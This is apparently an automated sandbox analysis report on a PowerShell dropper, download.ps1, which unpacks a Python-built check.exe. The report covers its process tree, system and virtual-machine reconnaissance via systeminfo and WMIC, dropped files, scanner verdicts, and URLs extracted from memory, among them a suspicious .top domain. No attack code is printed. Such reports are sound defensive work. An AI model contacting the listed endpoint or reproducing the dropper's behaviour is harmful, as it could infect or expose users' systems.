  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571745 Sample: download.ps1 Startdate: 09/12/2024 Architecture: WINDOWS Score: 64 95 nodejs.org 2->95 99 AI detected suspicious sample 2->99 10 powershell.exe 1 32 2->10         started        14 check.exe 153 2->14         started        16 check.exe 153 2->16         started        signatures3 process4 file5 77 C:\Users\user\AppData\Roaming\...\check.exe, PE32+ 10->77 dropped 103 Found suspicious powershell code related to unpacking or dynamic code loading 10->103 105 Loading BitLocker PowerShell Module 10->105 107 Powershell drops PE file 10->107 18 check.exe 153 10->18         started        21 conhost.exe 10->21         started        79 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->79 dropped 81 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 14->81 dropped 83 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 14->83 dropped 91 57 other files (none is malicious) 14->91 dropped 23 check.exe 14->23         started        85 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 16->85 dropped 87 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 16->87 dropped 89 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 16->89 dropped 93 57 other files (none is malicious) 16->93 dropped 26 check.exe 16->26         started        signatures6 process7 file8 69 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 18->69 dropped 71 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 18->71 dropped 73 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 18->73 dropped 75 57 other files (none is malicious) 18->75 dropped 28 check.exe 18->28         started        32 cmd.exe 23->32         started        34 systeminfo.exe 23->34         started        36 WerFault.exe 23->36         started        101 Opens network shares 26->101 38 cmd.exe 26->38         started        40 systeminfo.exe 26->40         started        42 WerFault.exe 26->42         started        signatures9 process10 dnsIp11 97 nodejs.org 104.20.22.46, 443, 49796, 49811 CLOUDFLARENETUS United States 28->97 111 Opens network shares 28->111 44 systeminfo.exe 2 1 28->44         started        47 cmd.exe 28->47         started        49 WerFault.exe 28->49         started        51 conhost.exe 32->51         started        53 WMIC.exe 32->53         started        55 conhost.exe 34->55         started        57 conhost.exe 38->57         started        59 WMIC.exe 38->59         started        61 conhost.exe 40->61         started        signatures12 process13 signatures14 109 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 44->109 63 conhost.exe 44->63         started        65 conhost.exe 47->65         started        67 WMIC.exe 47->67         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps18%ReversingLabsScript-PowerShell.Trojan.Powdow
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\MSVCP140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\MSVCP140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Core.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5DBus.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Gui.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Network.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Qml.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5QmlModels.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Quick.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Svg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5WebSockets.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\Qt5Widgets.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\d3dcompiler_47.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\bin\opengl32sw.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qgif.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qicns.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qico.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qjpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qsvg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qtga.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qtiff.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qwbmp.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\imageformats\qwebp.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qminimal.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qoffscreen.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qwebgl.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platforms\qwindows.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtCore.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtGui.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\QtWidgets.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\PyQt5\sip.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\_wmi.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\charset_normalizer\md.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\charset_normalizer\md__mypyc.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\libcrypto-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\libffi-8.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\libssl-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\psutil\_psutil_windows.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\python3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\python313.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44602\select.pyd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
nodejs.org
104.20.22.46
truefalse
    NameSourceMaliciousAntivirus DetectionReputation
    https://github.com/giampaolo/psutil/issues/875.check.exe, 00000005.00000002.2225643903.000001FA7DD34000.00000004.00001000.00020000.00000000.sdmpfalse
      https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zipcheck.exe, 00000005.00000002.2219688111.000001FA7CA90000.00000004.00001000.00020000.00000000.sdmpfalse
        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpfalse
          https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-filecheck.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpfalse
            http://goo.gl/zeJZl.check.exe, 00000005.00000002.2222101912.000001FA7D4F0000.00000004.00001000.00020000.00000000.sdmpfalse
              https://tools.ietf.org/html/rfc2388#section-4.4check.exe, 00000005.00000002.2218577759.000001FA7C492000.00000004.00000020.00020000.00000000.sdmpfalse
                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmpfalse
                  https://packaging.python.org/en/latest/specifications/entry-points/#file-formatcheck.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpfalse
                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963check.exe, 00000005.00000002.2221218618.000001FA7CFB0000.00000004.00001000.00020000.00000000.sdmpfalse
                      https://peps.python.org/pep-0205/check.exe, 00000005.00000003.1654050420.000001FA7C431000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219483322.000001FA7C990000.00000004.00001000.00020000.00000000.sdmpfalse
                        http://crl.dhimyotis.com/certignarootca.crlcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                          http://curl.haxx.se/rfc/cookie_spec.htmlcheck.exe, 00000005.00000002.2221834167.000001FA7D300000.00000004.00001000.00020000.00000000.sdmpfalse
                            http://ocsp.accv.escheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1577420148.000002B100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamecheck.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxycheck.exe, 00000005.00000002.2221428209.000001FA7D0D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688check.exe, 00000005.00000003.1670749370.000001FA7C463000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1672926306.000001FA7C45D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1674613587.000001FA7C462000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1674263339.000001FA7C456000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217897373.000001FA7C264000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.1671943165.000001FA7C45A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://httpbin.org/getcheck.exe, 00000005.00000002.2222101912.000001FA7D430000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2222101912.000001FA7D4E8000.00000004.00001000.00020000.00000000.sdmpfalse
                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1577420148.000002B100472000.00000004.00000800.00020000.00000000.sdmpfalse
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1577420148.000002B100229000.00000004.00000800.00020000.00000000.sdmpfalse
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1577420148.000002B101B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1577420148.000002B100472000.00000004.00000800.00020000.00000000.sdmpfalse
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1577420148.000002B100229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codecheck.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  https://go.micropowershell.exe, 00000000.00000002.1577420148.000002B1013B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://wwww.certigna.fr/autorites/0mcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercheck.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        https://github.com/python/cpython/issues/86361.check.exe, 00000005.00000002.2219001935.000001FA7C770000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1677633256.000001FA7C88D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1677633256.000001FA7C8E8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1678749648.000001FA7C8CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          http://www.accv.es/legislacion_c.htm5check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crljcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              http://mail.python.org/pipermail/python-dev/2012-June/120787.html.check.exe, 00000005.00000002.2221834167.000001FA7D300000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                https://httpbin.org/check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  https://wwww.certigna.fr/autorites/check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulecheck.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachescheck.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1577420148.000002B100229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535check.exe, 00000005.00000002.2219001935.000001FA7C7C9000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sycheck.exe, 00000005.00000002.2218577759.000001FA7C434000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadatacheck.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                http://crl.securetrust.com/STCA.crlcheck.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://wwwsearch.sf.net/):check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://github.com/python/importlib_metadata/wiki/Development-Methodologycheck.exe, 00000005.00000002.2219688111.000001FA7CA90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        http://www.accv.es/legislacion_c.htmcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://tools.ietf.org/html/rfc6125#section-6.4.3check.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            http://crl.xrampsecurity.com/XGCA.crl0check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1577420148.000002B101B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1577420148.000002B100472000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://www.cert.fnmt.es/dpcs/check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://google.com/mailcheck.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    https://packaging.python.org/specifications/entry-points/check.exe, 00000005.00000002.2221428209.000001FA7D0D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      http://crl.dhimyotis.com/certignarootca.crlx_check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://www.accv.es00check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          https://www.python.org/psf/license/)check.exe, 00000005.00000002.2243716928.00007FFB03588000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pycheck.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539check.exe, 00000005.00000002.2221218618.000001FA7CFB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.check.exe, 00000005.00000002.2219001935.000001FA7C7C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://google.com/check.exe, 00000005.00000002.2219001935.000001FA7C7C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://mahler:8092/site-updates.pycheck.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://crl.securetrust.com/SGCA.crlcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://.../back.jpegcheck.exe, 00000005.00000002.2221834167.000001FA7D300000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            https://httpbin.org/postcheck.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcecheck.exe, 00000005.00000002.2217897373.000001FA7C264000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/Ousret/charset_normalizercheck.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  http://www.firmaprofesional.com/cps0check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_speccheck.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920check.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        http://crl.securetrust.com/SGCA.crl0check.exe, 00000005.00000002.2218577759.000001FA7C492000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datacheck.exe, 00000005.00000002.2217466014.000001FA7A8C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://yahoo.com/check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://crl.securetrust.com/STCA.crl0check.exe, 00000005.00000002.2218577759.000001FA7C492000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6check.exe, 00000005.00000002.2219830861.000001FA7CD75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://ksdgbx9oenj.top/1.php?s=527powershell.exe, 00000000.00000002.1577420148.000002B100229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://html.spec.whatwg.org/multipage/check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://www.quovadisglobal.com/cps0check.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningscheck.exe, 00000005.00000002.2221428209.000001FA7D0D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://www.rfc-editor.org/rfc/rfc8259#section-8.1check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://requests.readthedocs.iocheck.exe, 00000005.00000002.2222101912.000001FA7D430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://www.cert.fnmt.es/dpcs/rcheck.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://repository.swisssign.com/check.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://crl.xrampsecurity.com/XGCA.crlcheck.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://www.python.orgcheck.exe, 00000005.00000002.2219830861.000001FA7CBCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://www.accv.es/legislacion_c.htm0Ucheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://ocsp.accv.es0check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://www.python.org/check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://json.orgcheck.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://docs.python.org/3/howto/mro.html.check.exe, 00000005.00000003.1669072978.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1674263339.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1672926306.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1670047595.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1666637860.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1666637860.000001FA7C4BA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1670749370.000001FA7C500000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2218834429.000001FA7C670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_packagecheck.exe, 00000005.00000002.2217897373.000001FA7C1E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://twitter.com/check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://stackoverflow.com/questions/4457745#4457745.check.exe, 00000005.00000002.2222728447.000001FA7D5A2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2225643903.000001FA7DD34000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://repository.swisssign.com/s:check.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://www.cert.fnmt.es/dpcs/Vcheck.exe, 00000005.00000002.2219830861.000001FA7CEFB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://www.quovadisglobal.com/cpscheck.exe, 00000005.00000002.2219830861.000001FA7CE80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_modulecheck.exe, 00000005.00000002.2217897373.000001FA7C264000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://google.com/check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219001935.000001FA7C841000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2219830861.000001FA7CD92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://google.com/mail/check.exe, 00000005.00000002.2219001935.000001FA7C7C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://google.com/mail/check.exe, 00000005.00000002.2219830861.000001FA7CC85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://github.com/urllib3/urllib3/issues/3290check.exe, 00000005.00000002.2221662095.000001FA7D1D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs
